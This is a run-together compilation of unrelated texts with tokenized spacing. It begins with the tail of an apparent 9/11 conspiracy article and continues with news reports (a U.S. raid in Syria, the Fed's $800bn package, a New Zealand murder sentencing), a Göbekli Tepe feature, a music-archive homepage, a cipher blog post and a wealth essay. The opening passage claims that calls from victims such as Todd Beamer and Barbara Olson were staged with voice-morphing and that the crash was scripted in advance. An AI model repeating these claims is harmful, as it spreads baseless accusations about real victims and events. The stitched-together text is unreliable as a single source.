The repeated calls give continuity to the script , as well as opportunities for myth - building .
Here ’s Todd Beamer , known to friends ( and observers ) as a kind of go - ahead , take - charge guy .
Perfect .
He will be the “ reason , ” decided well in advance of September 11 , why the plane crashes well short of the White House .
Caller D , the one alleged to be Todd Beamer , apparently had difficulty using his airfone .
This could be explained if the telephone used by the caller was not part of the Verizon system .
However , the caller could easily access the Verizon supervisory office over an ordinary telephone , explaining that he had been trying to reach someone .
Strangely enough , caller D preferred to talk to Lisa Jefferson ( asking her to call his loved ones for him ) , even though he was about to die .
One other cellphone call bears mention .
Barbara Olson , a well - known Washington lawyer and , more recently , television political pundit , died aboard American Airlines Flight 77 , the aircraft which reportedly struck the Pentagon building .
News reports ( San Diego , 2001 ) , ( BBC , 2001 ) , ( Telegraph , 2001 ) described two calls which Ms Olson made to her husband , Ted Olson , Solicitor General of the United States .
The caller said she had locked herself in the lavatory and attempted to place the call to Mr. Olson ten times before the charges were accepted .
The first conversation , in which the caller said , “ Can you believe this , we are being hijacked , ” was cut short , for some reason .
In a second attempt , the caller described men with boxcutters overpowering the flight crew , then asked , “ What do I tell the pilot to do ? ”
The Olson call is neither less nor more mysterious than the calls previously analysed .
In this case it might be asked what advice Ted Olson could possibly have for the pilot ( who was allegedly at the back of the plane with the passengers ) .
The foregoing analyses certainly do not prove that the cellphone operation actually took place .
But they clearly demonstrate that all the conversations are consistent with such an operation , along with a sprinkling of tantalizing clues that are more consistent with the operation than actual in - flight calls .
That is all one can hope for from such an analysis , even if the alternate scenario is correct or approximately correct .
Under the weight of evidence that the cellphone ( not airfone ) calls were essentially impossible as described by the Bush White House and the major media on the day in question , we have no alternative but to give serious consideration to the operational possibilities , as outlined here .
References
( Arkin 1999 ) Arkin W. H. When Seeing and Hearing Is n’t Believing .
WashingtonPost .Com .
Mon. Feb. 1/99 . Retrieved June 10/04 from < public-action.com/911/voice-simulation >
( AVWeb , 1999 ) Dahler C. 1999 .
AVWeb letters .
Retrieved November 20 , 2002 from < http://www.avweb.com/other/avma9910.html>
( BBC , 2001 ) British Broadcasting Corporation , 2001 .
Final calls from doomed flights , Retrieved November 3 , 2002 , from < http://news.bbc.co,
uk/1/hi/world/americas/1539193.stm>
( Curtiss 2003 ) Curtiss H. Despite Coverup , Israel Caught Spying in Washington Again .
Washington Report on Middle East Affairs .
June 2000 .
Retrieved June 10/04 from < www.wrmea.com/backissues/062000/
0006006.html
( Dewdney 2003a ) Dewdney A. K. 2003 .
Project Achilles : parts I , II , III .
Physics 911 .
Retrieved June 10 , 2004 from < physics911.org/net/modules / news/article.php?storyid=6 >
( Dewdney 2003 b ) Op Pearl
( Ex Pro 2004 ) Voice Transformer .
Executive Pro. 2004 .
Retrieved June 10/04 from < http://www.pimall.com/nais/provoice.html
( Fraizer , 2002 ) Fraizer J. How do I log on while in flight ?
North American Network Operators .
( June 27 2002 ) <www.irbs.net.internet/ nanog/0206 / 0907.html >.
Retrieved Sept. 3 , 2002 .
( Roddy et al. , 2001 ) Roddy DB , Lash C , Levin S , and Silver JD . Flight 93 : Forty lives , one destiny .
The Pittsburgh Post - Gazette .
Oct 28 , 2001 .
See also < www.post-gazette.com/headlines/ 20011028flt93mainstoryp7.asp > , Retrieved August 24 , 2002 .
( San Diego , 2001 ) San Diego Union - Tribune .
2001 .
Author calls spouse from doomed plane .
Retrieved November 8 , 2002 , from < http://www. signonsandiego.com/news/nation/terror/firstweek/20010912-9999_ 1n12olson.html >
( SeeStorm 2004 ) VoiceDisguise .
SeeStorm . 2004 .
Rerieved June 10/04 from < http://www.seestorm.com/products/vd.jsp>
( Spitzer , 1987 ) Spitzer CL. 1987 .
Digital Avionics Systems , New York , NY : McGraw Hill .
( Spook 2004 ) Voice Changer .
Spook Tech. 2004 .
Retrieved June 10 from http://www.spooktech.com/teledev/provoicechng.shtml>
( Telegraph , 2001 ) Harrison , D. 2001 .
Revealed : the men with stolen identities .
The Telegraph .
London .
September 23 , 2001 .
Retrieved September 29 , 2002 , from < www.portal.telegraph.co.uk/news/main.jhtml ?xml=/news/2001/09/23/widen23.xml>
( WRH 2004 ) Is Israel Blackmailing America ?
What Really Happened .
Retrieved June 10/04 from < www.whatreallyhappened.com/blackmail.
html >
The Electrolux Design Lab final to be held on October 9th in Zurich , showcasing the appliances of the future for the Internet generation .
Here are 9 finalists in no particular order .
Flatshare Fridge by Stefan Buchberger
Designed for the students sharing a flat , the refrigerator has a base station and 4 stackable modules , so each individual user has his or her own refrigerator space , which can be customized with various colorful skins as well as with add - ons like a bottle opener or a whiteboard .
With convenient handles , a module can be easily picked and hooked up to a base station in a new flat .
Drawer Kitchen by Nojae Park
The portable Drawer Kitchen comes with a desk - drawer hotplate and fridge making it one cool appliance combo suitable for your loft , vacation cabin or office .
iBasket Washing Machine by Guopeng Liang
This Wi-Fi-connected clothes hamper and washing machine can serve as a decorative piece as well .
Scan Toaster by Sung Bae Chang
With the help of hot wires that rotate within a 30° radius , the USB toaster prints news , weather and snapshots onto slices of your morning toast .
Sook Recipe Generator by Adam Brodowski
Sook comes with a moisture sensor , scale , and electronic tongue to determine what food is being prepped , then sends that information to the Sook Touch to generate a delicious recipe .
Stratosphere Sanitizer Clothes Rack by Attila Sáfrány
This sanitizing clothes rack / valet keeps clothes clean and dry .
Vesta Cooktop by Matthias Pinkert
The foldaway cooktop with RFID scanner which helps in providing information about cooking , times and temperatures and even recipe suggestions , Vesta can be folded flat or vertically against the wall .
Coox Cooking Table by Antoine Lebrun
This roll away cooking table allows you to cook and eat anywhere in your house .
Perfect as an extension of the dinner table , adjustable height .
E - Bag Cooler by Apore Püspöki
The cooler bag powered by kinetic energy , E - Bag keeps you food and drink cool anywhere you go .
Previously , Electrolux 2007 and 2006 Design Lab winners .
U.S. commandos crossing into Syria in an unprecedented raid this weekend killed a senior Al Qaeda associate accused of funneling fighters , weapons and cash to the insurgency in Iraq , U.S. officials familiar with the operation said Monday .
Abu Ghadiyah , the chief of a Syrian smuggling network who was killed in the controversial operation Sunday , was “ one of the most prominent , if not the most prominent , facilitators of foreign fighters going into Iraq for Al Qaeda , ” a senior U.S. official said .
The raid was the latest sign that the U.S. is now willing to mount attacks in sovereign nations in pursuit of insurgent groups operating in Iraq and Afghanistan , as well as those who support them .
Last month , U.S. special operations forces carried out a similar raid in the tribal border region of Pakistan , drawing loud criticism from the Pakistani public and senior government officials in Islamabad , the capital .
Syrian Foreign Minister Walid Moallem said the U.S. committed “ criminal and terrorist aggression ” by conducting a raid in which seven civilians died , including three children , a woman and a fisherman .
Advertisement
Two U.S. helicopters flew about five miles into Syria , he said , with one landing at a farm while the second provided cover .
A villager told the Associated Press he saw at least two men taken into custody by U.S. forces and whisked away by helicopter .
He spoke on condition of anonymity , saying he feared for his life .
U.S. officials did not say how many people died in the raid .
Abu Ghadiyah , an Iraqi native believed to be in his late 20s , has for several years been a key figure in the flow of foreign fighters and weapons into Iraq , American officials said .
“ He comes from a family of smugglers , ” said the senior U.S. official .
“ He seems to have turned the family business toward the movement of terrorists , explosives , weapons , etc. , into Iraq . ”
Advertisement
That official , along with others , spoke on condition of anonymity because of the classified nature of the operation .
Other than reporting Abu Ghadiyah ’s death , U.S. officials offered few details about the raid .
Pentagon officials declined to comment .
The rationale for using commandos was unclear .
Since the terrorist attacks on America in 2001 , the United States has carried out dozens of missile strikes , mostly in Pakistan , but also in Yemen and elsewhere , aimed at killing Al Qaeda operatives .
However , almost all of those operations have relied on CIA - operated Predator drones firing Hellfire antitank missiles .
The use of U.S. soldiers carries significantly greater risk and often leads to diplomatic strain , as has been the case with Pakistan .
Advertisement
U.S. counter - terrorism experts described Abu Ghadiyah , who is from Anbar province in western Iraq , as the head of a successful terrorist financial network supporting Iraq ’s Sunni Arab - led insurgency and a close associate of Al Qaeda in Iraq leaders .
“ He ’s the classic example of a terrorist facilitator and financier , ” said Matthew Levitt , who from 2005 to early 2007 helped oversee a U.S. government crackdown on Abu Ghadiyah ’s financial network while deputy assistant secretary for intelligence and analysis at the Treasury Department .
However , Abu Ghadiyah ’s death is unlikely to decimate the network because of its strong funding streams and because other members , including a brother , have been active , said Levitt , now with the Institute for Near East Policy , a Washington - based think tank .
The Treasury Department had previously imposed financial sanctions on Abu Ghadiyah and family members , saying they facilitated and controlled the flow of money , weapons , terrorists and other resources through Syria to Iraq .
Advertisement
The effectiveness of such financial enforcement actions has been questioned .
The actions target militants and those providing financial or material support , freezing any known assets under U.S. jurisdiction and prohibiting U.S. firms and individuals from doing business with them .
U.S. officials said Abu Ghadiyah , a nickname for Badran Turki Hishan Mazidih , was appointed by former Al Qaeda in Iraq leader Abu Musab Zarqawi to be the group ’s Syrian commander for logistics in 2004 .
After Zarqawi ’s death in 2006 , Abu Ghadiyah began working for the new leader of Al Qaeda in Iraq , Abu Ayyub Masri , according to U.S. officials .
Abu Ghadiyah provided and arranged false passports , weapons , guides , safe houses and allowances to foreign terrorists preparing to enter Iraq , Treasury officials said .
U.S. officials maintain that Syria has long functioned as a hub for terrorist financing in Iraq , coordinating the movement of recruits and money between cells in Europe and Ansar al Islam training camps in northern Iraq .
Advertisement
In Baghdad , the Shiite Muslim - led Iraqi government said it wanted good ties with Syria but that Damascus needed to do more to stop fighters from slipping across its borders .
Iraqi government spokesman Ali Dabbagh described the region targeted by the Americans as the “ scene for many terrorist activities of the last few months , ” including the killing of 13 policemen in an Iraqi border village in Anbar province .
Staunch Syrian ally Iran , which holds enormous sway over the Baghdad government and opposes the U.S. troop presence in Iraq , condemned the U.S. operation .
“ We condemn any attack which leads to the killing of innocents and civilians , ” Foreign Ministry official Hassan Qashqavi told reporters in Tehran .
--
Advertisement
greg.miller@latimes.com
josh.meyer@latimes.com
Times staff writers Ned Parker and Saif Hameed in Baghdad , Borzou Daragahi in Beirut and Julian E. Barnes in Washington and special correspondent Ramin Mostaghim in Tehran contributed to this report .
The World 's First Temple Volume 61 Number 6 , November / December 2008 by Sandra Scham
Turkey 's 12,000 - year - old stone circles were the spiritual center of a nomadic people
Hunter - gatherers used stone tools to create images of male creatures on T - shaped pillars .
Most of the carvings show dangerous animals , such as this lion .
( Klaus Schmidt )
At first glance , the fox on the surface of the limestone pillar appears to be a trick of the bright sunlight .
But as I move closer to the large , T - shaped megalith , I find it is carved with an improbable menagerie .
A bull and a crane join the fox in an animal parade etched across the surface of the pillar , one of dozens erected by early Neolithic people at Göbekli Tepe in southeastern Turkey .
The press here is fond of calling the site " the Turkish Stonehenge , " but the comparison hardly does justice to this 25 - acre arrangement of at least seven stone circles .
The first structures at Göbekli Tepe were built as early as 10,000 B.C. , predating their famous British counterpart by about 7,000 years .
The oldest man-made place of worship yet discovered , Göbekli Tepe is " one of the most important monuments in the world , " says Hassan Karabulut , associate curator of the nearby Urfa Museum .
He and archaeologist Zerrin Ekdogan of the Turkish Ministry of Culture guide me around the site .
Their enthusiasm for the ancient temple is palpable .
By the time of my visit in late summer , the excavation team lead by Klaus Schmidt of the German Archaeological Institute has wrapped up work for the season .
But there is still plenty to see , including three excavated circles now protected by a large metal shelter .
The megaliths , which may have once supported roofs , are about nine feet tall .
Göbekli
Tepe 's circles range from 30 to 100 feet in diameter and are surrounded by rectangular stone walls about six feet high .
Many of the pillars are carved with elaborate animal figure reliefs .
In addition to bulls , foxes , and cranes , representations of lions , ducks , scorpions , ants , spiders , and snakes appear on the pillars .
Freestanding sculptures depicting the animals have also been found within the circles .
During the most recent excavation season , archaeologists uncovered a statue of a human and sculptures of a vulture 's head and a boar .
As we walk around the recently excavated pillars , the site seems at once familiar and exotic .
I have seen stone circles before , but none like these .
Excavations have revealed that Göbekli Tepe was constructed in two stages .
The oldest structures belong to what archaeologists call the early Pre-Pottery Neolithic A period , which ended around 9000 B.C. Strangely enough , the later remains , which date to the Pre-Pottery Neolithic B period , or about 8000 B.C. , are less elaborate .
The earliest levels contain most of the T - shaped pillars and animal sculptures .
Archaeologist Klaus Schmidt downplays extravagant spiritual interpretations of Göbekli Tepe , such as the idea , made popular in the press , that the site is the inspiration for the Biblical Garden of Eden .
But he does agree that it was a sanctuary of profound significance in the Neolithic world .
He sees it as a key site in understanding the transition from hunting and gathering to agriculture , and from tribal to regional religion .
Schmidt and his colleagues estimate that at least 500 people were required to hew the 10 - to 50 - ton stone pillars from local quarries , move them from as far as a quarter - mile away , and erect them .
How did Stone Age people achieve the level of organization necessary to do this ?
Hauptmann speculates that an elite class of religious leaders supervised the work and later controlled the rituals that took place at the site .
If so , this would be the oldest known evidence for a priestly caste -- much earlier than when social distinctions became evident at other Near Eastern sites .
Klaus Schmidt of the German Archaeological Institute believes Göbekli Tepe attracted small nomadic groups from numerous regions throughout southeastern Anatolia .
( Haldun Aydingün )
Before the discovery of Göbekli Tepe , archaeologists believed that societies in the early Neolithic were organized into small bands of hunter - gatherers and that the first complex religious practices were developed by groups that had already mastered agriculture .
Scholars thought that the earliest monumental architecture was possible only after agriculture provided Neolithic people with food surpluses , freeing them from a constant focus on day - to - day survival .
A site of unbelievable artistry and intricate detail , Göbekli Tepe has turned this theory on its head .
Schmidt believes the people who created these massive and enigmatic structures came from great distances .
It seems certain that once pilgrims reached Göbekli Tepe , they made animal sacrifices .
Schmidt and his team have found the bones of wild animals , including gazelles , red deer , boars , goats , sheep , and oxen , plus a dozen different bird species , such as vultures and ducks , scattered around the site .
Most of these animals are depicted in the sculptures and reliefs at the site .
There is still much that we do n't understand about religious practices at Göbekli Tepe , Schmidt cautions .
But broadly speaking , the animal images " probably illustrate stories of hunter - gatherer religion and beliefs , " he says , " though we do n't know at the moment . "
The sculptors of Göbekli Tepe may have simply wanted to depict the animals they saw , or perhaps create symbolic representations of the animals to use in rituals to ensure hunting success .
Schmidt has another theory about how Göbekli Tepe became a sacred place .
Though he has yet to find them , he believes that the first stone circles on the hill of the navel marked graves of important people .
Hauptmann 's team discovered graves at Nevali Cori , and Schmidt is reasonably confident that burials lie somewhere in the earliest layers of Göbekli Tepe .
This leads him to suspect the pillars represent human beings and that the cult practices at this site may initially have focused on some sort of ancestor worship .
The T - shaped pillars , he points out , look like human bodies with the upper part of the " T " resembling a head in profile .
Once , Schmidt says , they stood on the hillside " like a meeting of stone beings . "
Sandra Scham is ARCHAEOLOGY 's Washington , D.C. , correspondent and a fellow at the American Association for the Advancement of Science .
An Auckland woman has been sentenced to life imprisonment with minimum non parole period of 17 years for the murder of ten month old baby Jynia Te Awa .
Tiana Kapea , who was the child ’s minder , has also been sentenced to three years jail on a cruelty charge – that is to be served concurrently with the life sentence .
Kapea , 30 , admitting murdering Jyniah last year .
Kapea was baby sitting Jyniah when she was taken from a Manurewa house to Middlemore Hospital in September last year with a brain injury .
She was transferred to Auckland ’s Starship Hospital but died the next day .
The court was told that Kapea was a trusted friend of Jyniah ’s family .
During her short life , the baby was held against a gas heater , swung around by her hair , hung on the back of a wardrobe door and put in a closed freezer several times .
She died from injuries after being kicked , thrown against a wall , shaken and smothered .
Jyniah ’s mother Lisa Cassidy says she still can’t believe Kapea abused her baby , when she had trusted her .
She says she went to church , she had good children and was a best friend to her .
Cassidy says the sentence gives her family some closure and says every night she and her children cry and pray to have nice dreams .
Relatives of Jynia wore t- shirts in court with slogans demanding justice for the little girl on Tuesday .
They burst into spontaneous applause when the sentence was announced .
Remembrance Day commemorations will be held around the country today , 90 years after the end of World War I .
Thousands of people are expected to attend a service at the Australian War Memorial in Canberra .
The guns fell silent on the Western Front on November 11 , 1918 .
Ten million soldiers lost their lives in the Great War - 60,000 of them were Australian .
Don Rowe from the RSL hopes their sacrifice is on the minds of all Australian 's today .
" We as a nation are indeed indebted to them and the only way we can repay that debt is never forgetting what they did for us , " he said .
Mr Rowe says the tradition of Remembrance Day began after World War I .
" It really affected everybody , it affected certainly every family in Australia at that time , " he said .
Prime Minister Kevin Rudd and Opposition Leader Malcolm Turnbull will be among those paying their respects in Canberra .
Thousands are expected to attend the ceremony in Canberra .
Leigh Harris from the Australian War Memorial says crowds at today 's ceremony will be invited to lay poppies on the tomb of the unknown soldier .
" Poppies are significant for Remembrance Day because it was the first flower to bloom on the Western Front at the end of the First World War after all the fighting had finished , " she said .
Meanwhile , A 107 - year - old veteran of both World Wars has used Remembrance Day to call for Australian troops to be brought home .
Claude Choules enlisted in the British Royal Navy when he was 14 - years - old and was present at the scuttling of the German Fleet at Scapa Flow at the end of World War I .
He moved to Western Australia in 1926 , and served with the Royal Australian Navy during World War II .
Mr Choules says he would like to see an end to the conflicts in Iraq and Afghanistan .
" I do n't want to see any more wars .
Seeing war is not exciting , like it used to be , " he said .
When World War II broke out , Mr Choules says he decided to fight again , this time with the Royal Australian Navy .
" I thought well , it 's exciting once , it should be exciting twice .
Why not , " he said .
SNESmusic.org
the music archive ~ version 2 ξ
Welcome to SNESmusic.org
This site offers a database of music from the classic Super Nintendo respectively Super Famicom gaming system , background informations about composers and companies as well as other goodies .
This site is still a work in progress .
As such we are looking for people willing to fill out the remaining gaps by contributing composer and company informations as well as release dates and game genres to the games already existing in our database .
At this moment this site offers 1519 SPC sets spanning 2631 games out of 3127 known games , composed by 3255 different composers , produced by 1379 different companies and put together for your pleasure by so far 329 contributors .
Those SPC sets were downloaded 5911180 times altogether since this shiny new site version 2 exists .
Have fun browsing and listening !
All soundtracks on this site are playable with so - called SPC players .
If you cannot find a soundtrack to a particular SNES games you can also browse the database of all known SNES games and request or even directly contribute them there .
A list of much requested games is on our wiki , where you can also find incomplete sets , our rules and more stuff .
Tool News
SNESAmp , our primary SPC player , had been updated to version 3.3.4 on March 28th .
Get the new tool for easily renaming your RSN files to the full game names : renset v.0.6 from December 4th , the last dat file update is from January 11th .
SPCRen , the tool for renaming single SPC files into a custom file name scheme , has been updated to version 3.2 on October 17th .
Due to popular demand we are now offering a torrent download of our whole archive , the last torrent file update is from March 21st .
The 50 newest sets
Recent updates
May 4th , 2020
Site disclaimer
All of the files ( music , pictures , trade names etc. ) offered in the SNESmusic.org 's archive are copyrighted and owned by their respective original artists / software companies .
All files are for educational and personal non-profit use only , offered as fair use samples for preservation purposes only .
Every further use , eg. copying the music to audio media , might need the approvement of the copyright holder .
Please refer to your country 's patent , intellectual property and copyright law for more detailed informations .
Every single SPC file contains the artist 's name and the copyright holder .
Please consider supporting them by buying their work if you like their work .
I admit , yesterday ’s cipher , courtesy of the FBI and the Life Magazine photo archive , is neat , but not really all that exciting .
That ’s okay , because what I ’ve got today is immensely awesome :
An example of a pre-war German espionage code .
No , really …
The information for this picture says it was taken in 1941 , and shows “ An agent of the FBI decoding a message that was encrypted using the anagram encryption method ” .
Except … I ’m fairly sure that ’s wrong , and cool as the caption would be , were that true , reality , I believe you ’ll find , is even better .
The date is July 24th , 1940 .
The place , the New York City Field Office of the FBI .
The memo , from Director Hoover , is short and cryptic :
CLEARANCE AUTHORIZED FOR FOLLOWING MESSAGE : “ DUNN SAYS FOUR BATTLESHIPS AND TEN DESTROYERS OF TEXAS CLASS GOING TO CARIBBEAN TO SCOUT FOR ENGLISH WITH SIX HUNDRED RESERVE OFFICERS AND SIX HUNDRED ENLISTED MEN . ” HOOVER
Below that appears to be the same basic message … in German .
Above , a number of five - character letter groups .
What ’s going on here ?
A lot more than meets the eye , that ’s what .
Students of intelligence history may know that “ Dunn ” was the code - name given by the Germans to Fritz Duquesne , infamous linchpin of the Duquesne spy ring in the early part of WWII .
Duquesne was “ played ” by an American double - agent named William Sebold , who was instrumental in crushing Duquesne ’s – and Germany ’s – espionage operations in this country .
What you see here is a photo that never should have been allowed to be taken , and one which provides an amazing , one - of - a- kind glimpse into the world of WWII espionage and counter - espionage .
As far as I can tell , what is shown in this picture is an FBI agent in New York encrypting a message , passed from “ DUNN ” – Duquesne – through Sebold , prior to transmitting that message to Germany via shortwave radio .
Unlike yesterday ’s photo , which was clearly staged , this appears to be real cryptology at work .
Even the message is most likely real : it refers to the Neutrality Patrol undertaken shortly before the outbreak of war .
What I think is really cool , though , is that the photo also shows the agent ’s worksheet :
I know it ’s a little difficult to read , and we ’re only looking at a “ message depth ” of one , but I ’m pretty confident that some clever reader out there can use this photo to re-create the code in question .
Admittedly , doing so is pointless , except as an academic exercise , but consider : how many other opportunities are budding cryptologists going to get to examine and play with a pre-war German espionage code ?
Hoping for an Obama effect in D.C .
The Washington , D.C. police department launched a new initiative with a familiar slogan today , hoping to bring the sense of national change to urban youth .
The " No Shots Fired " initatiative " encourages youth to have a peaceful gunfire - free weekend , " according to the press release .
There are all sorts of hopes about cultural pivots that Obama 's election may produce ; immediate effects on crime rates seems a particularly ... hopeful one .
Astronomy Picture of the Day Discover the cosmos !
Each day a different image or photograph of our fascinating universe is featured , along with a brief explanation written by a professional astronomer .
2008 November 21
M76 Above and Below
Credit & Copyright : Don Goldman
Explanation : Also known by the popular name the " Little Dumbbell Nebula " , M76 is one of the fainter objects listed in Charles Messier 's 18th century Catalog of Nebulae and Star Clusters .
Like its better - known namesake M27 ( the Dumbbell Nebula ) , M76 is recognized as a planetary nebula - a gaseous shroud cast off by a dying sunlike star .
The nebula itself is thought to be shaped more like a donut , its central box - like appearance due to our nearly edge - on view .
Gas expanding more rapidly away from the donut hole produces the more extensive , far flung material in this remarkable image that uses narrow - band filters to highlight the emission from hydrogen ( in red ) and oxygen atoms ( in greenish blue ) .
In particular , complex oxygen emission features are seen above and below the main nebula to a degree not detected in most images of M76 .
Distance estimates place M76 about 3 to 5 thousand light - years away toward the heroic constellation Perseus , making the nebula over a light - year in diameter .
Please turn on JavaScript .
Media requires JavaScript to play .
The Federal Reserve is to inject another $ 800 bn ( £ 526.8 bn ) into the US economy in a further effort to stabilise the financial system .
US Treasury Secretary Henry Paulson said the stimulus package aimed to make more lending available to consumers .
About $ 600 bn will be used to buy up mortgage - backed securities while $ 200bn is being targeted at unfreezing the consumer credit market .
Financial institutions are reluctant to lend , deepening the economic slowdown .
US BAIL - OUTS IN BRIEF 19 September : US officials start working on a $ 700 bn plan to help rid US banks of bad debts 6 October : The Fed announces plans to buy massive amounts of short - term debt from companies in an effort to unfreeze the money markets 14 October : US government taps into the $ 700bn available to announce a $ 250 bn plan to purchase stakes in a variety of banks 9 November : Insurance giant AIG gets fresh financial help from the US government , which brings the total aid package for the firm to about $ 150 bn .
12 November : Authorities abandon plans to use some of the $ 700 bn to buy up banks ' bad debts .
The bail - out fund will be used to buy shares in ailing lenders 25 November : A new $ 800 bn stimulus package announced
Costly plan creates debt mountain US government bail - outs so far
The situation has been exacerbated as the credit crisis has worsened .
Meanwhile US President - elect Barack Obama said budget reform was " imperative " with the economy in crisis .
" It is not an option .
It 's a necessity , " he said .
' Troubling '
Key lending such as credit cards , car loans and student loans had essentially come to a halt in October , Mr Paulson said .
He added that the new measures were aimed at getting these types of lending back to more normal levels .
" It will take time to work through the difficulties in our market and our economy and new challenges will continue to arise , " he said .
" We are committed to using all the tools at our disposal to preserve the strength of our financial institutions and stabilise our financial markets to minimise the spill - over into the rest of the economy . "
The announcement came as Commerce Department figures showed US economic output shrank between July and September at a faster pace than initially predicted , which the White House described as " troubling " .
GDP fell at an annual rate of 0.5 % in the third - quarter - from the 0.3 % estimated a month ago - as consumers cut spending by the largest amount in 28 years .
" This is why we are having to take such bold actions , " a White House spokeswoman said .
THE $ 800 BN BAIL - OUT
$ 100 bn - Buying debts from Freddie Mac and Fannie Mae
$ 500 bn - Buying mortgage - backed securities
$ 200 bn - Lending to holders of debt backed by consumer loans Meanwhile , the Standard & Poor 's / Case - Shiller national home price index slumped by a record 16.6 % during the quarter from the same period a year ago - taking prices down to levels not seen since early 2004 .
Bail - out details
Under the latest rescue plan - which is in addition to the already - announced $ 700 bn bank bail - out - the Fed is to buy up to $ 100bn in debt from the troubled mortgage giants Fannie Mae and Freddie Mac .
The central bank said it would also buy another $ 500bn in mortgage - backed securities - pools of mortgages that are bundled together and sold to investors .
The Fed said that the $ 600 bn effort to support the mortgage market was being taken to reduce the cost of home mortgages and increase their availability .
They are getting to the heart of the problem , it 's clean , it 's quick , it 's direct
Todd Abraham , Federated Investors
Obama vows to reform US budget
It said the purchases of the mortgages and mortgage - backed securities would take place over a number of months .
In addition to the $ 600 bn effort on mortgages , the Fed also unveiled a separate programme to help unfreeze the consumer debt market .
The central bank said it would lend up to $ 200bn to the holders of securities backed by various types of consumer loans , such as credit cards and student loans .
Analyst reaction News of the latest massive financial rescue plan was generally welcomed .
" They are getting to the heart of the problem , it 's clean , it 's quick , it 's direct .
It 's a good way to bring down mortgage rates , because at the end of the day they have to stabilise the housing market , " said Todd Abraham of Federated Investors , Pittsburgh .
Robert Macintosh , chief economist with Eaton Vance , Boston , said : " If they can pull it off it 'll make some people happy , but I do n't know how effective it 'll actually be . "
Scott Brown , chief economist at Raymond James Associates , Florida , said : " Here is the Fed taking a bunch of debt out of the market , which does n't hurt .
I think it should it should help unblock the credit markets . "
The severe financial crisis that is rocking global markets at the moment began more than a year ago with rising defaults on sub - prime mortgages , loans provided to borrowers with weak credit histories .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
DIGG THIS
People often say to me about someone else they know : “ He ’s got a lot of money , ” or “ They ’re loaded . ”
Does that sound all too familiar ?
In the course of normal , everyday conversation , careless adults will bring up someone — a neighbor , friend , colleague , or acquaintance — whom they refer to as “ having a lot of money . ”
They use words like " rich , " " loaded , " and " well off . "
And they use these words to imply “ financial wealth , ” essentially .
And since there are different types of wealth , I will refer strictly to what these people are attempting to convey : genuine financial prosperity and balance sheet wealth .
Of course , I quickly process the individual ’s words , kick into the skeptic mode , and try to validate the statement .
I stop the course of the conversation and ask , “ How is that so ?
What makes you think they are loaded ? ”
I ask the person what facts exist that led him to say this , what does he think wealth means , or , what ’s the nature of that person ’s personal balance sheet ?
Are the assets encumbered by debt , or , is there really substantial equity ?
At this point , he is checkmated .
He has not , of course , looked at the balance sheet of the " loaded " individual he speaks of .
He knows nothing about the origins of the accumulated assets or the funding behind the ultra-consumption .
You can see glitzy assets and observe the consumption , but without a balance sheet you do not know to what extent the consumption and assets were financed and to what level the personal equity has been zapped to fund purchases .
And I do not do this to knock people down ; I consider it a necessary educational process to get folks to start defining their terms as opposed to speaking in marketable sound bites .
The typical replies are : “ Oh , but they have a Lexus and an Escalade , and you should see the clothes she wears … . ” or “ They live in the ______ subdivision of _____ and go to _____ every year for vacation …. ” or “ He ’s an engineer for GM , and she is a ______ , and they have got the most beautiful summer home up in ______ … ”
We hear this kind of muddled thinking from folks all too often .
The explanations for why people are perceived as being “ rich ” are always tied to vacations , things , adult toys , cars , bragging by the person in question ( the most obvious sign of hype ) , and of course , the house .
The house , in fact , defines a persons existence .
The critical mistake people have a tendency to make is forming conclusions about someone ’s wealth based upon their observations of visible material items .
People who have lots of " things " usually have them because they do n’t save , they over - consume in relation to their income , and more often than not they incur debt — lots of it — to get the stuff .
The last couple of times I heard about someone ’s " loaded " friend with great houses , and even better vacations , I acerbically asked , “ What do they do for a living ? ”
The first one was a schoolteacher , and the other one was a nurse .
Amazingly , people just do n’t know how to do the quick math on their common sense calculator .
It is remarkable that people — especially college - degreed types — ca n’t make the distinction between accumulation or consumption and personal wealth .
Whereas someone would define someone else as being “ rich , ” I , upon seeing a balance sheet , would know that this person is oftentimes the opposite of rich : plenty of declining assets , in debt , negative personal equity , and little or no savings .
Remember , purchases of assets — the plasma TV , sports car , or the new construction house — if made from cash savings , is merely a reclassification of assets and is not a step up in personal wealth .
And these assets — durable consumer goods — decline rapidly in terms of value .
The Jamaican or Paris vacation , paid for in cash , is a decrease of an asset , an increase to an expense , and a negative hit to equity .
The 100 % financed Lexus — which is typical on a middle - class income — is an equal increase to an asset and a liability that only increases one ’s debt - to - equity ratio .
A shiny , new car , but there ’s definitely no wealth increase here .
The purchase has only created a weaker balance sheet and the illusion of prosperity ( think of Wall Street financial firms ) that is being conveyed to those who do n’t understand basic financial concepts .
Clearly , uninformed people have made a mockery of defining wealth and prosperity .
Their immediate perception is their reality , and their perceptions are clouded by ignorance and a lack of desire for the facts .
Instead , they prefer exaggerated tales that make a bold statement about something they do not understand .
Unfortunately , spreading misinformation makes for a far more interesting conversation — think sound bites and hook lines — than putting forth the time and effort to pursue the truth .
The accumulation of things , however , cannot ever be equated with personal wealth .
A book to read to understand the difference between having “ things ” and having wealth is The Millionaire Next Door : The Surprising Secrets of America ’s Wealthy .
Here ’s the Amazon review of the book :
How can you join the ranks of America ’s wealthy ( defined as people whose net worth is over one million dollars ) ?
It ’s easy , say doctors Stanley and Danko , who have spent the last 20 years interviewing members of this elite club : you just have to follow seven simple rules .
The first rule is , always live well below your means .
The last rule is , choose your occupation wisely .
You ’ll have to buy the book to find out the other five .
It ’s only fair .
The authors ’ conclusions are commonsensical .
But , as they point out , their prescription often flies in the face of what we think wealthy people should do .
There are no pop stars or athletes in this book , but plenty of wall - board manufacturers — particularly ones who take cheap , infrequent vacations !
Stanley and Danko mercilessly show how wealth takes sacrifice , discipline , and hard work , qualities that are positively discouraged by our high - consumption society .
" You are n’t what you drive , ” admonish the authors .
If you want to determine your individual wealth , merely looking at income or assets ( stuff ) is not the answer .
Acquiring things via revolving credit may add to your assets ( a plasma TV or a killer surround - sound system ) , but it adds to your liabilities as well , so there ’s no increase in your equity .
Hence , there ’s no " wealth " created here .
Essentially , you are n’t what you drive but you are what you save .
Think of personal wealth in this sense : Total assets minus total liabilities = equity .
Real wealth is reflected in your equity on your personal balance sheet , not from your subdivision location , vacations , or driveway .
In America , we are witnessing a record - breaking number of foreclosures .
A foreclosure — or worse yet , homelessness — occurs because people live paycheck - to - paycheck .
That means they do n’t have the cash savings to make one more payment to buy them one more month in their home .
They have things , including the home and its contents , but little or no equity to fall back on .
What a reckless way to live .
Unlike with General Motors , regular folks can’t keep sliding by on massive negative equity without suffering devastating consequences .
